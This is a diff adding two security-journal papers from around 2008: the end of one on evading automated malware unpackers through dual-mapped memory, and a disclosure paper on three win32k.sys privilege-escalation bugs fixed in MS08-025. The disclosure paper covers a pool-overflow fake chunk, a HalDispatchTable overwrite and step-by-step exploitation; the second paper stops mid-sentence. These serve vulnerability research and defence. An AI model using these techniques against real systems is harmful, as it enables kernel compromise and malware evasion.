+RAID 2008 after the completion of the initial draft of this paper[9]. Justin +differs from previous work in that is uses hardware non-executable paging +support to enforce W ^ X on virtual address regions. When an execution +attempt occurs, an exception is generated and Justin determines whether or not +the page being executed from was written to previously. The authors of Justin +correctly identified the evasion technique described in the following section +and have attempted to design their system to counter it. Their approach +involves verifying that the protection attributes are the same across all +virtual addresses that map to the same physical pages. This should be an +effective countermeasure, although there is certainly room for attacking +implementation weaknesses, should any exist. + +2. Dual-mapping + +The automated unpackers described previously rely on their ability to detect +the execution of dynamic code from virtual addresses that have been written +to. This implicitly assumes that the virtual address used to execute code +will be equal to an address that was written to previously. While this +assumption is safe in most circumstances, it is possible to use features +provided by the Windows memory manager to evade this form of detection. + +The basic idea behind this evasion technique involves dual-mapping a set of +physical pages to two virtual address regions. The first region is considered +an editable mapping and the second region is considered an executable mapping. +The contents of the unpacked executable are written to the editable mapping +and later executed using the executable mapping. Since both mappings are +associated with the same physical pages, the act of writing to the editable +mapping indirectly alters the contents of the executable mapping. This evades +detection by making it appear that the code that is executed from the +executable mapping was never actually written to. This technique is +preferable to writing the unpacked executable to disk and then mapping it into +memory as doing so would enable trivial unpacking and detection. + +Implementing this evasion technique on Windows can be accomplished using fully +supported user-mode APIs. First, a pagefile-backed section (anonymous memory +mapping) must be created using the CreateFileMapping API. The handle returned +from this function must then be passed to MapViewOfFile to create both the +editable and executable mappings. Finally, the dynamic code must be unpacked +into the editable mapping through whatever means and then executed using the +executable mapping. This is illustrated in the code below: + +ImageMapping = CreateFileMapping( + INVALID_HANDLE_VALUE, NULL, + PAGE_EXECUTE_READWRITE | SEC_COMMIT, + 0, CodeLength, NULL); + +EditableBaseAddress = MapViewOfFile(ImageMapping, + FILE_MAP_READ | FILE_MAP_WRITE, + 0, 0, 0); +ExecutableBaseAddress = MapViewOfFile(ImageMapping, + FILE_MAP_EXECUTE | FILE_MAP_READ | FILE_MAP_WRITE, + 0, 0, 0); + +CopyMemory(EditableBaseAddress, + CodeBuffer, CodeLength); + +((VOID (*)())ExecutableBaseAddress)(); + +The example code provides an illustration of using this technique to execute +dynamic code. This technique should also be fairly easy to adapt to the +unpacking code used by existing packers. One consideration that must be made +when using this technique is that relocations must be applied to the unpacked +executable relative to the base address of the executable mapping. With that +said, the relocation fixups themselves must be applied to the editable mapping +in order to avoid tainting the executable mapping. + +An additional evasion technique may also be necessary for certain dynamic +unpackers that monitor code execution from any virtual address, regardless of +whether or not it was previously written to. This is the case with Saffron's +paging-based automated unpacker[5]. For performance reasons, Saffron only logs +information the first time code is executed from a page. If the contents of +the code changes after this point, Saffron will not be aware of them. This +makes it possible to evade this form of unpacking by executing innocuous code +from each page of the executable mapping. Once this has finished, the actual +unpacked executable can be extracted into the editable mapping and then +executed normally. This evasion technique should also be effective against +Justin due to the fact that Justin does not trap on subsequent execution +attempts from a given virtual address[9]. + +While these evasion techniques are expected to be effective, they have not +been experimentally verified. There are a number of reasons for this. No +public version of Pandora's Bochs is currently available. However, its author +has indicated that this technique should be effective. Renovo provides a web +interface that can be used to analyze and unpack executables. No data was +received after uploading an executable that simulated this evasion technique. +The authors of Saffron have indicated that they expected this technique to be +effective. + +3. Weaknesses + +Perhaps the most significant weakness of the dual-mapping technique is that it +is not capable of evading all automated unpackers. For example, dynamic +unpacking techniques that strictly focus on control flow transfers, such as +PolyUnpack[7] and ParaDyn[6], should still be effective. However, this +weakness could be overcome by incorporating additional evasion techniques, +such as those mentioned in cited work[7]. + +Automated unpackers could also attempt to invalidate the dual-mapping +technique by monitoring writes and code execution in terms of physical +addresses rather than virtual addresses. This would be effective due to the +the fact that both the editable and executable virtual mappings would refer to +the same physical addresses. However, this approach would likely require a +better understanding of operating system semantics since memory may be paged +in and out at any time. + +4. Conclusion + +The dual-mapping technique can be used by packers to evade automated unpacking +tools that rely on detecting dynamic code execution from virtual addresses +that have been written to. While this evasion technique is expected to be +effective in its current form, it should be possible for automated unpackers +to adapt to handle this scenario such as by monitoring writes to physical +pages or by better understanding operating system semantics that deal with +virtual memory mappings. + +References + +[1] L. Boehne. Pandora's bochs: Automatic unpacking of malware. + http://www.0x0badc0.de/PandorasBochs.pdf, Jan 2008. + +[2] Mihai Christodorescu, Johannes Kinder, Somesh Jha, Stefan Katzenbeisser, + and Helmut Veith. Malware normalization. Technical Report 1539, University + of Wisconsin and Madison, Wisconsin, USA, November 2005. + +[3] M. Gyung Kang, P. Poosankam, and H. Yin. Renovo: A hidden code extractor + for packed executables. + http://www.andrew.cmu.edu/user/ppoosank/papers/renovo.pdf, Oct 2007. + +[4] L. Martignoni, M. Christodorescu, and S. Jha. Omniunpack: Fast and generic + and and safe unpacking of malware. + http://www.acsac.org/2007/papers/151.pdf, December 2007. + +[5] Danny Quist and Valsmith. Covert debugging: Circumventing software + armoring techniques. BlackHat USA, Aug 2007. + +[6] K. Roundy. Analysis and instrumentation of packed binary code. + http://www.cs.wisc.edu/condor/PCW2008/paradyn_presentations/roundy-packedCode.ppt, + Apr 2008. + +[7] P. Royal, M. Haplin, D. Dagon, R. Edmonds, and W. Lee. Polyunpack: + Automating the hidden-code extraction of unpack-executing malware. 22nd + Annual Computer Security Applications Conference, Dec 2005. + +[8] J. Stewart. Ollybone. 2006. + +[9] Fanglu Guo, Peter Ferrie, and Tzi cker Chiueh. A study + of the packer problem and its solutions. In RAID, pages + 98.115, 2008. diff --git a/uninformed/10.3.txt b/uninformed/10.3.txt new file mode 100644 index 0000000..8429431 --- /dev/null +++ b/uninformed/10.3.txt @@ -0,0 +1,867 @@ +Analyzing local privilege escalations in win32k +10/2008 +mxatone +mxatone@gmail.com + +Abstract: This paper analyzes three vulnerabilities that were found in +win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a +major component of the GUI subsystem in the Windows operating system. These +vulnerabilities have been reported by the author and patched in MS08-025[1]. The +first vulnerability is a kernel pool overflow with an old communication +mechanism called the Dynamic Data Exchange (DDE) protocol. The second +vulnerability involves improper use of the ProbeForWrite function within +string management functions. The third vulnerability concerns how win32k +handles system menu functions. Their discovery and exploitation are covered. + +1) Introduction + +The design of modern operating systems provides a separation of privileges +between processes. This design restricts a non-privileged user from directly +affecting processes they do not have access to. This enforcement relies on +both hardware and software features. The hardware features protect devices +against unknown operations. A secure environment provides only necessary +rights by filtering program interaction within the overall system. This +control increases provided interfaces and then security risks. Abusing +operating system design or implementation flaws in order to elevate a +program's rights is called a privilege escalation. + +During the past few years, userland code and protection had been ameliorated. +The amelioration of operating system understanding has made abnormal behaviour +detection easier. The exploitation of classical weakness is harder than it +was. Nowadays, local exploitation directly targets the kernel. Kernel local +privilege escalation brings up new exploitation methods and most of them are +certainly still undiscovered. Even if the Windows kernel is highly protected +against known attack vectors, the operating system itself has a lot of +different drivers that contribute to its overall attack surface. + +On Windows, the graphical user interface (GUI) is divided into both +kernel-mode and user-mode components. The win32k.sys driver handles user-mode +requests for graphic rendering and window management. It also redirects +DirectX calls on to the appropriate driver. For local privilege escalation, +win32k represents an interesting target as it exists on all versions of +Windows and some features have existed for years without modifications. + +This article presents the author's work on analyzing the win32k driver to find +and report vulnerabilities that were addressed in Microsoft bulletin +MS08-025[1]. Even if the patch adds an overall protection layer, it concerns +three reported vulnerabilities on different parts of the driver. The Windows +graphics stack is very complex and this article will focus on describing some +of win32k's organization and functionalities. Any reader who is interested in +this topic is encouraged to look at MSDN documentation for additional +information. + +The structure of this paper is as follows. In chapter , the win32k driver +architecture basics will be presented with a focus on vulnerable contexts. +Chapter will detail how each of the three vulnerabilities was discovered and +exploited. Finally, chapter will discuss possible security improvements for +the vulnerable driver. + +2) Win32k design + +Windows is based on a graphical user interface and cannot work without it. Only +Windows Serer 2008 in server core mode uses a minimalist user interface but +share the exact same components that typical user interfaces. The win32k driver +is a critical component in the graphics stack exporting more than 600 functions. +It extends the System Service Descriptor Table (SSDT) with another +table called (W32pServiceTable). This driver is not as big as the +main kernel module (ntoskrnl.exe) but its interaction with the +user-mode is just as important. The service table for win32k contains less than +300 functions depending on the version of Windows. The win32k driver commonly +transfers control to user-mode with a user-mode callback system that will be +explained in this part. The interface between user-mode modules and +kernel-mode drivers has been built in order to facilitate window creation and +management. This is a critical feature of Windows which may explain why +exactly the same functions can be seen across multiple operating system +versions. + +2.1) General security implementation + +The most important part of a driver in terms of security is how it validates +user-mode inputs. Each argument passed as a pointer must be a valid user-mode +address and be unchangeable to avoid race conditions. This validation is often +accomplished by comparing a provided address with an address near the base of +kernel memory using functions such as ProbeForRead and ProbeForWrite. Input +contained within pointers is also typically cached in local variables +(capturing). The Windows kernel design is very strict on this part. When you +look deeper into win32k's functions, you will see that they do not follow the +same strict integrity verifications made by the kernel. For example, consider +the following check made by the Windows kernel (translated to C): + +NTSTATUS NTAPI NtQueryInformationPort( + HANDLE PortHandle, + PORT_INFORMATION_CLASS PortInformationClass, + PVOID PortInformation, + ULONG PortInformationLength, + PULONG ReturnLength + ) + +[...] // Prepare local variables + +if (AccesMode != KernelMode) +{ + try { + // Check submitted address - if incorrect, raise an exception + ProbeForWrite( PortInformation, PortInformationLength, 4); + + if (ReturnLength != NULL) + { + if (ReturnLength > MmUserProbeAddress) + *MmUserProbeAddress = 0; // raise exception + + *ReturnLength = 0; + } + + } except(1) { // Catch exceptions + return exception_code; + } +} + +[...] // Perform actions + +We can see that the arguments are tested in a very simple way before doing +anything else. The ReturnLength field implements its own verification which +relies directly on MmUserProbeAddress. This variable marks the separation +between user-mode and kernel-mode address spaces. In case of an invalid +address, an exception is raised by writting in this variable which is +read-only. The ProbeForRead and ProbeForWrite functions verifications routines +raised an exception if an incorrect address is encounter. However, the win32k +driver does not allows follow this pattern: + +BOOL NtUserSystemParametersInfo( + UINT uiAction, + UINT uiParam, + PVOID pvParam, + UINT fWinIni) + +[...] // Prepare local variables + +switch(uiAction) +{ + case SPI_1: + // Custom checks + break; + case SPI_2: + size = sizeof(Stuct2); + goto prob_read; + case SPI_3: + size = sizeof(Stuct3); + goto prob_read; + case SPI_4: + size = sizeof(Stuct4); + goto prob_read; + case SPI_5: + size = sizeof(Stuct5); + goto prob_read; + case SPI_6: + size = sizeof(Struct6); + +prob_read: + ProbeForRead(pvParam, size, 4) + + [...] +} + +[...] // Perform actions + +This function is very complex and this example presents only a small part of +the checks. Some parameters need only classic verification while others +implement their own. This elaborate code can create confusion which improves +the chances of a local privilege escalation. The issues comes from unordinary +kernel function that handles multiple features at the same time without +implementing a standardized function prototype. The Windows kernel solved this +issue on NtSet* and NtQuery* functions by using two simple arguments. The +first argument is a classical buffer and the second argument is its size. For +example, the NtQueryInformationPort function will check the buffer in a +generic way and then only verify that the size correspond to the specified +feature. The win32k design implementation ameliorates GUI development but make +code review very difficult. + +2.2) KeUsermodeCallback utilization + +Typical interaction between user-mode and kernel-mode is done via syscalls. A +user-mode module may request that the kernel execute an action and return +needed information. The win32k driver has a callback system to do the exact +opposite. The KeUsermodeCallback function calls a user-mode function from +kernel-mode. This function is undocumented and provided by the kernel module +in a secure way in order to switch into user-mode properly. The win32k driver +uses this functionality for common task such as loading a dll module for event +catching or retrieving information. The prototype of this function: + +NTSTATUS KeUserModeCallback ( + IN ULONG ApiNumber, + IN PVOID InputBuffer, + IN ULONG InputLength, + OUT PVOID *OutputBuffer, + IN PULONG OutputLength + ); + +Microsoft did not make a system to retrieve arbitrary user-mode function +addresses from the kernel. Instead, the win32k driver has a set of functions +that it needs to call. This list is kept in an undocumented function table in +the Process Environment Block (PEB) structure for each process. The ApiNumber +argument refers to an index into this table. + +In order to return on user-mode, KeUserModeCallback retrieves the user-mode +stack address from saved user-mode context stored in a thread's KTRAP_FRAME +structure. It saves current stack level and uses ProbeForWrite to check if +there is enough room for the input buffer. The Inputbuffer argument is then +copied into the user stack and an argument list is created for the function +being called. The KiCallUserMode function prepares the return in user-mode by +saving important information in the kernel stack. This callback system works +as a normal syscall exit procedure except than stack level and eip register +has been changed. The callback start in the KiUserCallbackDispatcher function. + +VOID KiUserCallbackDispatcher( + IN ULONG ApiNumber, + IN PVOID InputBuffer, + IN ULONG InputLength + ); + +The user-mode function KiUserCallbackDispatcher receives an argument list +which contains ApiNumber, InputBuffer, and InputLength. It does appropriate +function dispatching using the PEB dispatch table. When it is finished the +routine invokes interrupt 0x2b to transfer control back to kernel-mode. In +turn, the kernel inspects three registers: + + - ecx: contains a user-mode pointer for OutputBuffer + - edx: is for OutputLength + - eax: contains return status. + +The KiCallbackReturn kernel-mode function handles the 0x2B interrupt and +passes important registers as argument for the NtCallbackReturn function. +Everything is cleaned using saved information within the kernel stack and it +transfers to previously called KeUsermodeCallback function with proper output +argument sets. + +The reader should notice that nothing is done to check ouput data. Each kernel +function that uses the user-mode callback system is responsible for verifying +output data. An attacker can simply hook the KiUserCallbackDispatcher +function and filter requests to control output pointer, size and data. This +user-mode call can represent an important issue if it was not verified as +seriously as system call functions. + +3) Discovery and exploitation + +The win32k driver was patched by the MS08-025 bulletin[1]. This bulletin did +not disclose any details about the issues but it did talk about a +vulnerability which allows privilege elevation though invalid kernel checks. +This patch increases the overall driver security by adding multiple +verifications. In fact, this patch was due to three different reported +vulnerabilities. The following sections explain how these vulnerabilities were +discovered and exploited. + +3.1) DDE Kernel pool overflow + +The Dynamic Data Exchange (DDE) protocol is a GUI integrated message system . +Despite Windows operating system has already many different message +mechanisms, this one share data across process by sharing GUI handles and +memory section. This feature is quite old but still supported by Microsoft +application as Internet explorer and used in application firewalls bypass +technique. During author's research on win32k driver, he investigated how the +KeUsermodeCallback function was used. As described previously, this function +does not verify directly output data. This lack of validation is what leads +to this vulnerability. + +3.1.1) Vulnerability details + +The vulnerability exists in the xxxClientCopyDDEIn1 win32k function. It is +not called directly but it is used internally in the kernel when messages are +exchanged between processes using the DDE protocol. In this context, the +OutputBuffer verification is analyzed. + +In xxxClientCopyDDEIn1 function: + +lea eax, [ebp+OutputLength] +push eax +lea eax, [ebp+OutputBuffer] +push eax +push 8 ; InputLength +lea eax, [ebp+InputBuffer] +push eax +push 32h ; ApiNumber +call ds:__imp__KeUserModeCallback@20 +mov esi, eax ; return < 0 (error ?) +call _EnterCrit@0 +cmp esi, edi +jl loc_BF92C6D4 + +cmp [ebp+OutputLength], 0Ch ; Check output length +jnz loc_BF92C6D4 + +mov [ebp+ms_exc.disabled], edi ; = 0 +mov edx, [ebp+OutputBuffer] +mov eax, _Win32UserProbeAddress +cmp edx, eax ; Check OutputBuffer address +jb short loc_BF92C5DC + +[...] + +loc_BF92C5DC: +mov ecx, [edx] +loc_BF92C5DE: +mov [ebp+var_func_return_value], ecx +or [ebp+ms_exc.disabled], 0FFFFFFFFh +push 2 +pop esi +cmp ecx, esi ; first OutputBuffer ULONG must be 2 +jnz loc_BF92C6D4 +xor ebx, ebx +inc ebx +mov [ebp+ms_exc.disabled], ebx ; = 1 +mov [ebp+ms_exc.disabled], esi ; = 2 +mov ecx, [edx+8] ; OutputBuffer - user mode ptr +cmp ecx, eax ; Win32UserProbeAddress - check user mode ptr +jnb short loc_BF92C602 + +[...] + +loc_BF92C602: +push 9 +pop ecx +mov esi, eax +lea edi, [ebp+copy_output_data] +rep movsd +mov [ebp+ms_exc.disabled], ebx ; = 1 +push 0 +push 'EdsU' +mov ebx, [ebp+copy_output_data.copy1_size] ; we control this +mov eax, [ebp+copy_output_data.copy2_size] ; and this +lea eax, [eax+ebx+24h] ; integer overflow right here +push eax ; NumberOfBytes +call _HeavyAllocPool@12 +mov [ebp+allocated_buffer], eax +test eax, eax +jz loc_BF92C6B6 + +mov ecx, [ebp+var_2C] +mov [ecx], eax ; save allocation addr +push 9 +pop ecx +lea esi, [ebp+copy_output_data] +mov edi, eax +rep movsd ; Copy output data +test ebx, ebx +jz short loc_BF92C65A + +mov ecx, ebx +mov esi, [ebp+copy_output_data.copy1_ptr] +lea edi, [eax+24h] +mov edx, ecx +shr ecx, 2 +rep movsd ; copy copy1_ptr (with copy1_size) +mov ecx, edx +and ecx, 3 +rep movsb + +loc_BF92C65A: +mov ecx, [ebp+copy_output_data.copy2_size] +test ecx, ecx +jz short loc_BF92C676 +mov esi, [ebp+copy_output_data.copy2_ptr] +lea edi, [ebx+eax+24h] +mov edx, ecx +shr ecx, 2 +rep movsd movsd ; copy copy2_ptr (with copy2_size) +mov ecx, edx +and ecx, 3 +rep movsb + +The DDE copydata buffer contains two different buffers with their respective +sizes. These sizes are used to calculate the size of a buffer that is +allocated. However, appropriate checks are not made to detect if an integer +overflow occurs. An integer overflow exists when an arithmetic operation is +done between different integers that would go behind maximum integer value and +then create a lower integer. As such, the allocated buffer may be smaller than +each buffer size which leads to a kernel pool overflow. The pool is the name +used to designated the Windows kernel heap. + +3.1.2) Pool overflow exploitation + +The key to exploiting this issue is more about how to exploit a kernel pool +overflow. Previous work has described the kernel pool system and +exploitation[8,9]. This paper will focus on the exploiting the vulnerability +being described. + +The kernel pool can be thought of as a heap. Memory is allocated by the +ExAllocatePoolWithTag function and then freed using the ExFreePoolWithTag +function. Depending of memory size, a header chunk precedes memory data. +Exploiting a pool overflow involves replacing the next chunk header with a +crafted version. This header is available though ntoskrnl module symbols as: + +typedef struct _POOL_HEADER +{ + union + { + struct + { + USHORT PreviousSize : 9; + USHORT PoolIndex : 7; + USHORT BlockSize : 9; + USHORT PoolType : 7; + } + ULONG32 Ulong1; + } + union + { + struct _EPROCESS* ProcessBilled; + ULONG PoolTag; + struct + { + USHORT AllocatorBackTraceIndex; + USHORT PoolTagHash; + } + } +} POOL_HEADER, *POOL_HEADER; // sizeof(POOL_HEADER) == 8 + +Size fields are a multiple of 8 bytes as an allocated block will always be 8 +byte aligned. Windows 2000 pool architecture is different. Memory blocks are +aligned on 16 bytes and flags type is a simple UCHAR (no bitfields). The +PoolIndex field is not important for our overflow and can be set to 0. The +PoolType field contains chunk state with multiple possible flags. The busy +flag changes between operating system version but free chunk always got the +PoolType field to zero. + +During a pool overflow, the next chunk header is overwritten with malicious +values. When the allocated block is freed, the ExFreePoolWithTag function will +look at the next block type. If the next block is free it is coalesced by +unlinking and merging it with current block. The LIST_ENTRY structure links +blocks together and is adjacent to the POOL_HEADER structure if current chunk +is free. The unlinking procedure is exactly the same as the behavior of the +user-mode heap except that no safe unlinking check is done. This procedure is +repeated for previous block. Many papers already explained unlinking +exploitation which allows writing 4 bytes to a controlled address. However, +this attack breaks a pool's internal linked list and exploitation must take +this into consideration. As such, it is necessary to restore the pool's list +integrity to prevent the system from crashing. + +There are a number of different addresses that may be overwritten such as +directly modifying code or overwriting the contents of a function pointer. In +local kernel exploitation, the target address should be uncommonly unused by +the kernel to prevent operating system instability. In his paper, Ruben +Santamarta used a function pointer accessible though an exported kernel +variable named HalDispatchTable[10]. This function pointer is used by +KeQueryIntervalProfile which is called by the system call +NtQueryIntervalProfile. Overwriting the function pointer at HalDispatchTable+4 +does not break system behavior as this function is unsupported. A clean +privilege escalation code should consider restoring overwritten data. in +default configuration. For our exploitation, this is the best choice as it is +easy to launch and target. + +The exploitation code for this this particular vulnerability should produce +this fake chunk: + +Fake next pool chunk header for Windows XP / 2003: + +PreviousSize = (copy1_size + sizeof(POOL_HEADER)) / 8 +PoolIndex = 0 +BlockSize = (sizeof(POOL_HEADER) + 8) / 8 +PoolType = 0 // Free chunk + +Flink = Execute address - 4 // in userland - call +4 address +Blink = HalDispatchTable + 4 // in kernelland + +Modification for Windows 2000 support: + +PreviousSize = (copy1_size + sizeof(POOL_HEADER)) / 16 +BlockSize = (sizeof(POOL_HEADER) + 15) / 16 + +The Flink field points on a user-mode address less 4 that will be called from +the kernel address space once the Blink function pointer would be replaced. +When called by the kernel, the user-mode address will execute at ring0 and is +able to modify operating system behavior. + +In this specific vulnerability, to avoid a crash and control copied data in +target memory buffer, copy2ptr should point to a NOACCESS memory page. When +the copy occurs, an exception will be raised which will be caught by a +try/except block in the function. For this exception, the allocated buffers +are freed. Copied memory size would be controlled by copy1size field and +integer overflow will be done by copy2size field. This configuration allows to +overflow only the necessary part. + +3.1.3) Delayed free pool overflow on Windows Vista + +The allocation pool type in win32k on Windows Vista uses an undocumented +DELAY_FREE flag. With this flag, the ExFreePoolWithTag function does not +liberate a memory block but instead pushes it into a deferred free list. If +the kernel needs more memory or the deferred free list is full it will pop an +entry off the list and liberate it through normal means. This can cause +problems because the actual free may not occur until many minutes later in a +potentially different process context. Due to this problem, both Flink and +Blink pointers must be in the kernel mode address space. + +The HalDispatchTable overwrite technique can be reused to support this +configuration. The KeQueryIntervalProfile function disassembly shows how the +function pointer is used. This context is always the same across Windows +versions. + +mov [ebp+var_C], eax +lea eax, [ebp+arg_0] +push eax +lea eax, [ebp+var_C] +push eax +push 0Ch +push 1 +call off_47503C ; xHalQuerySystemInformation(x,x,x,x) + +The first and the second arguments points into user-mode in the NULL page. +This page can be allocated using the NtAllocateVirtualMemory function with an +unaligned address in NULL page. The kernel function will realign this pointer +on lower page and allocate this page. This page is also used in kernel NULL +dereference vulnerabilities. In order to exploit this context, a stub of +machine code must be found which returns on first argument and where next 4 +bytes can be overwritten. This is the case of function epilogues as for wcslen +function: + +.text:00463B4C sub eax, [ebp+arg_0] +.text:00463B4F sar eax, 1 +.text:00463B51 dec eax +.text:00463B52 pop ebp +.text:00463B53 retn +.text:00463B54 db 0CCh ; alignement padding +.text:00463B55 db 0CCh +.text:00463B56 db 0CCh +.text:00463B57 db 0CCh +.text:00463B58 db 0CCh + +In this example, the 00463B51h address fits our needs. The pop instruction +pass the return address and the retn instruction return in 1. The alert +reader noticed that the selected address start at dec instruction. The +unlinking procedure unlinks the next 4 bytes and the 00463B54h address has 5 +padding bytes. Without this padding, overwriting unknown assembly could lead +to a crash compromising the exploitation. The location of this target address +changes depending on operating system version but this type of context can be +found using pattern matching. On Windows Vista, the vulnerability exploitation +loops calling the NtQueryIntervalProfile function until deferred free occurs +and exploitation is successful. This loop is mandatory as pool internal +structure must be corrected. + +3.2) NtUserfnOUTSTRING kernel overwrite vulnerability + +The NtUserfnOUTSTRING function is accessible through an internal table used by +NtUserMessageCall exported function. Functions starting by "NtUserfn" can be +called with SendMessage function exported by user32.dll module. For this +function the WM_GETTEXT window message is necessary. Notice that in some cases +a direct call is needed for successful exploitation. Verifications made by +SendMessage function are trivial as it is used for different functions but +should be considered. The MSDN website describes SendMessage utilization . + +3.2.1) Evading ProbeForWrite function + +The ProbeForWrite function verifies that an address range resides in the +user-mode address space and is writable. If not, it will raise an exception +that can be caught by a try / except code block. This function is used by a +lot by drivers which deal with user-mode inputs. THe following is the start of +the ProbeForWrite function assembly: + +void __stdcall ProbeForWrite(PVOID Address, SIZE_T Length, ULONG Alignment) + +mov edi, edi +push ebp +mov ebp, esp +mov eax, [ebp+Length] +test eax, eax +jz short loc_exit ; Length == 0 + +[...] + +loc_exit: +pop ebp +retn 0Ch + +This short assembly dump underlines one way to evade ProbeForWrite function. +If Length argument is zero, no verification is done on Address argument. It +means that Microsoft considers that a zero length input do not require address +to point in userland. Microsoft made a blog post on MS08-025[12] and why +ProbeForWrite was not modified as expected. Microsoft compatibility concern is +understandable but at least ProbeForWrite documentation should be updated for +this case. + +3.2.2) Vulnerability details + +This vulnerability touches not only this function but a whole class of string +management functions. Some functions make sure that length argument is not +zero before its modification. Others do not even check the length argument. A +proof of concept has been made on this vulnerability by Ruben Santamarta[11]. + +The NtUserfnOUTSTRING function vulnerability evades the ProbeForWrite function +and overwrites 1 or 2 bytes of kernel memory. This function disassembly is +below: + +In NtUserfnOUTSTRING (WM_GETTEXT) + +xor ebx, ebx +inc ebx +push ebx ; Alignment = 1 +and eax, ecx ; eax = our size | ecx = 0x7FFFFFFF +push eax ; If our size is 0x80000000 then + ; Length is zero (avoid any check) +push esi ; Our kernel address +call ds:__imp__ProbeForWrite@12 +or [ebp+var_4], 0FFFFFFFFh +mov eax, [ebp+arg_14] +add eax, 6 +and eax, 1Fh +push [ebp+arg_10] +lea ecx, [ebp+var_24] +push ecx +push [ebp+arg_8] +push [ebp+arg_4] +push [ebp+arg_0] +mov ecx, _gpsi +call dword ptr [ecx+eax*4+0Ch] ; Call appropriate sub function +mov edi, eax +test edi, edi +jz loc_BF86A623 ; Something goes wrong + +[...] + +loc_BF86A623: +cmp [ebp+arg_8], eax ; Submit size was 0 ? (no) +jz loc_BF86A6D1 + +[...] + +push [ebp+arg_18] ; Wide or Multibyte mode +push esi ; Our address +call _NullTerminateString@8 ; <== 0 byte or short overwriting + +In this function, a high size (0x80000000) can bypass ProbeForWrite function +verification. After this verification, it calls a function based on win32k +internal function pointer table. This function depends of the calling context. +If it is in the same thread that submitted handle it will go directly on +retrieval function, otherwise it can be cached by another function waiting for +proprietary thread handling this request. This assembly sample highlights null +byte overwriting if other functions failed. The null byte assures that a valid +string is returned. This is not the only way to overwrite memory. By using an +edit box, we could overwrite kernel memory with a custom string but the first +way fit the need. + +The exploitation is trivial and will not be detailed in this part. The first +vulnerability already exposed a target address and the way to allocate the +NULL page which were used to demonstrate this vulnerability. + +3.3) LoadMenu handle table corruption + +The win32k driver implements its own handle mechanism. This system shares a +handle table between user-mode and kernel-mode. This table is mapped into the +user mode address space as read-only and is modified in kernel mode address +space. The MS07-017 bulletin found by Cesar Cerrudo during Month of Kernel +Bugs (MOKB) [13] describes this table and how its modification could permit kernel +code execution. This chapter addresses another vulnerability based on GDI +handle shared table entry misuse. + +3.3.1) Handle table + +In the GUI architecture, an handle contains different information as an index +in the shared handle table and the object type. The handle table is an array +of the undocumented HANDLE_TABLE_ENTRY structure. + +typedef struct _HANDLE_TABLE_ENTRY +{ + union + { + PVOID pKernelObject; + ULONG NextFreeEntryIndex; // Used on free state + }; + WORD ProcessID; + WORD nCount; + WORD nHandleUpper; + BYTE nType; + BYTE nFlag; + PVOID pUserInfo; +} HANDLE_TABLE_ENTRY; // sizeof(HANDLE_TABLE_ENTRY) == 12 + +The nType field defines the table entry type. A free entry has the type zero +and nFlag field which defines if it is destroyed or currently in destroy +procedure. Normal handle verification routines check this value before getting +pKernelInfo field which points to the associated kernel handle. In a free +entry, the NextFreeEntryIndex field contains the next free entry index which +is not a pointer but a simple unsigned long value. + +The GUI object structure depends of object type but starts with the same +structure which contains corresponding index in the shared handle table. This +architecture lies on both elements. It switches between each table entry and +kernel object depending of needs. A security issue exists if the handle table +is not used as it should. + +3.3.2) Vulnerability details + +The vulnerability itself exists in win32k's xxxClientLoadMenu function which +does not correctly validate a handle index. This function is called by the +GetSystemMenu function and returns to user-mode using the KeUsermodeCallback +function to retrieve a handle index. The following assembly shows how this +value is used. + +and eax, 0FFFFh ; eax is controlled +lea eax, [eax+eax*2] ; index * 3 +mov ecx, gSharedTable +mov edi, [ecx+eax*4] ; base + (index * 12) + +This assembly sample uses an unchecked handle index and return pKernelObject +field value of target entry. This pointer is returned by the xxxClientLoadMenu +function. Proper verification are not made which permit deleted handle +manipulation. A deleted handle has its NextFreeEntryIndex field set between +0x1 and 0x3FFF. The return value will be in first memory pages. + +A system menu is linked to a window object. This window object is designated +by an handle passed as an argument of the GetSystemMenu function. The +spmenuSys field of the window object is set with the returned value of the +xxxClientLoadMenu function. In this specific context, the spmenuSys value is +hardly predictable inside the NULL page. During thread exit, the Window +liberation will look at spmenuSys object and using its index in the shared +table, toggle nFlag field state to destroyed and nType as free. In the case +the NULL page is filled with zero value, it will destroy the first entry in +the GDI shared handle table. + +Exploitation is achieved by reusing vulnerable functions once the first entry +has been destroyed. The GetSystemMenu function locks and unlocks the GDI +shared handle table entry linked with kernel object returned by the +xxxClientLoadMenu function. If the entry flag is destroyed the unlock function +calls the type destroy callback. For the first entry, the flag has been set to +destroyed. There is no callback for this type as it is not supposed to be +unlocked. The unlock function will call zero which allows kernel code +execution. This specific handle management architecture stay undocumented. +The purpose of liberation callback inside the thread unlocking procedure is +unusual. + +Exploitation steps: + + 1. Allocate NULL address + 2. Exploitation loop - second iteration trigger call zero: + a. Create a dialog + b. Set NULL page data to zero + c. Set a relative jmp at zero address + d. Create a menu graphic handle (or another type). + e. Destroy this menu handle + f. Call GetSystemMenu + g. Intercept user callback and return destroyed menu handle index (mask 0x3fff of the handle) + h. Exit this thread - set zero handle entry as free and destroyed. + +There are multiple ways to exploit this vulnerability. The author truly +believes that exploiting the locking procedure could be used on handle leak +vulnerabilities as it was for this vulnerability. Indeed this vulnerability +exploitation stays complex and unusual. This specific context made +exploitation even more interesting. + +4) GUI architecture protection + +Create a safe software is a hard task that is definitely harder than find +vulnerabilities. This work is even harder when it concerns old components +which must respect compatibility rules. This article does not blame Microsoft +for those vulnerabilities; it presents global issues on Windows architecture. +In Windows Vista, Microsoft starts securing its operating system +environment. The Windows Vista base code is definitely safer than it was. +Some kernel components as the win32k driver are not safe enough and should +be considered as a priority in local operating system security. + +The GUI architecture does not respect security basics. Starting from scratch +would certainly be a good option if it was possible. The global organization +of this driver make security audits a mess. In the other hand, the Windows API +shows it responses developer needs. There is a big abstraction layer between +userland API and kernel functions. It can be use to rebuild the win32k driver +without breaking compatibility. The API must follow user needs and be as easy +as it can be. There is no reason that kernel driver exported function could +not be changed in a secure way. It represents an enormous work which would be +achieved only across operating system version. Nevertheless this is necessary. +This modification could also increase performance by reducing unneeded context +switching. There is no clever reason going in the kernel to ask userland a +value that will be returned to userland. The user-mode callback system does +not fit in a consistent GUI architecture. + +Local exploitation techniques also highlight unsecure components as kernel +pool and how overwriting some function pointers allow kernel code execution. +In the past, the userland has been hardened as exploitation was too easy and +third parties software could permit compromising a computer. The kernel +performance is critical and adds verification routines and security measure +could break this advantage. The solution should be in operating system +evolution which does not restrict user experience. The hardware improvement +does not forgive that modern operating system requires more resources than +before. + +Software development follows fastest way except when a specific result is +expected. A company does not search the better way but something that cost +less for almost the same result. Microsoft did not choose readiness by +starting Security Development Lifecycle (SDL)[14] and should continue in this 